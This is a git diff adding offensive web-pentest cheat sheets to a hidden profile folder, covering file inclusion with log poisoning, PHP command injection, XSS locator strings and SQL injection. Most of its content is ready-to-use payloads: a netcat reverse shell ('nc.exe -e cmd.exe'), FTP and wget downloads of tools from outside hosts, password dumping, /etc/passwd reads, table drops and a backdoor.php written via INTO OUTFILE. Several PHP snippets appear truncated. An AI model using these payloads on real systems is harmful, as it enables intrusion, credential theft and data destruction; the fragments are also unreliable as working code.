diff --git a/profile_files/.ptz/v3das/web_file_inclusion.txt b/profile_files/.ptz/v3das/web_file_inclusion.txt
new file mode 100644
index 0000000..c4e4c7e
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_file_inclusion.txt
@@ -0,0 +1,41 @@
+
+Local File Inclusion
+====================
+
+The %00 make php 5.3 and below ignore everything after that.
+
+Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
+...then let's add code to the access log :)
+~# nc 192.168.1.1 80
+
+...and use it
+http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
+...or php shell on linux:)
+&3 2>&3");?>
+...finally send the requests to nc and exploit:
+
+# Windows FTP upload
+echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
+nc.exe -e cmd.exe 192.168.1.1 31337
+
+- - - - - - - -
+ system('echo open 192.168.1.1 21 > ftp.txt'); ?>
+ system('echo haxor >> ftp.txt'); ?>
+ system('echo haxor >> ftp.txt'); ?>
+ system('echo bin >> ftp.txt'); ?>
+ system('echo GET nc.exe >> ftp.txt'); ?>
+ system('echo bye >> ftp.txt'); ?>
+ system('ftp -s:ftp.txt'); ?>
+ system('nc.exe -e cmd.exe 192.168.1.1 31337'); ?>
+
+
+ system("cat /etc/passwd"); ?>
+
+
+
+
+Remote file Inclusion
+=====================
+Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
+Note: the login.txt contains
+
diff --git a/profile_files/.ptz/v3das/web_fuzz_strings.txt b/profile_files/.ptz/v3das/web_fuzz_strings.txt
new file mode 100644
index 0000000..72bb7c3
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_fuzz_strings.txt
@@ -0,0 +1,14 @@
+
+XSS locator
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
+
+
+XSS locator 2
+'';!--"=&{()}
+
+
+
+
+Other fuzzing char list
+><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}
+
diff --git a/profile_files/.ptz/v3das/web_injection_php.txt b/profile_files/.ptz/v3das/web_injection_php.txt
new file mode 100644
index 0000000..72dd935
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_injection_php.txt
@@ -0,0 +1,11 @@
+
+PHP command injection
+=====================
+
+There are just some ideas.
+
+ system('apt-get install netcat -y'); ?>
+ system('netcat 14.5.1.44 8080'); ?>
+ system('wget http://14.5.1.44:8080/'); ?>
+ system('init 6'); ?>
+
diff --git a/profile_files/.ptz/v3das/web_injection_sqli.txt b/profile_files/.ptz/v3das/web_injection_sqli.txt
new file mode 100644
index 0000000..d459f64
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_injection_sqli.txt
@@ -0,0 +1,43 @@
+
+SQLi notes
+==========
+
+Login bypass
+any' or 1=1 limit 1 ;#
+' OR '1' = '1 / ' OR '1' = '1
+;# ;-- #
+
+
+?id=737 order by 6 --> Testing max columns
+?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
+?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
+?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
+?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
+?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
+
+
+More examples
+
+x%') #
+x%') or 1=1 #
+x%') order by 4 #
+x%') union select all 4 #
+x%') union select all 1,2,3@@version #
+x%') and 1=1 #
+
+x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
+x%') and drop table if exists customers #
+x%') and create database test #
+x%') ; DROP ALL TABLES; #
+
+@@hostname
+
+wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
+
+
+Adding backdor.php
+?id=737 union select all 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
+
+Getting a shell with php execute
+192.168.3.1/comment.php?id=737 union select all 1,2,3,4," system('echo open 192.168.1.9 21 > ftp.txt'); ?> system('echo haxor>> ftp.txt'); ?> system('echo haxor>> ftp.txt'); ?> system('echo bin >> ftp.txt'); ?> system('echo GET nc.exe >> ftp.txt'); ?> system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'
+
diff --git a/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
new file mode 100644
index 0000000..e494f29
--- /dev/null
+++ b/profile_files/.ptz/v3das/web_xss_cookie_stealing.txt
@@ -0,0 +1,3 @@
+
+
+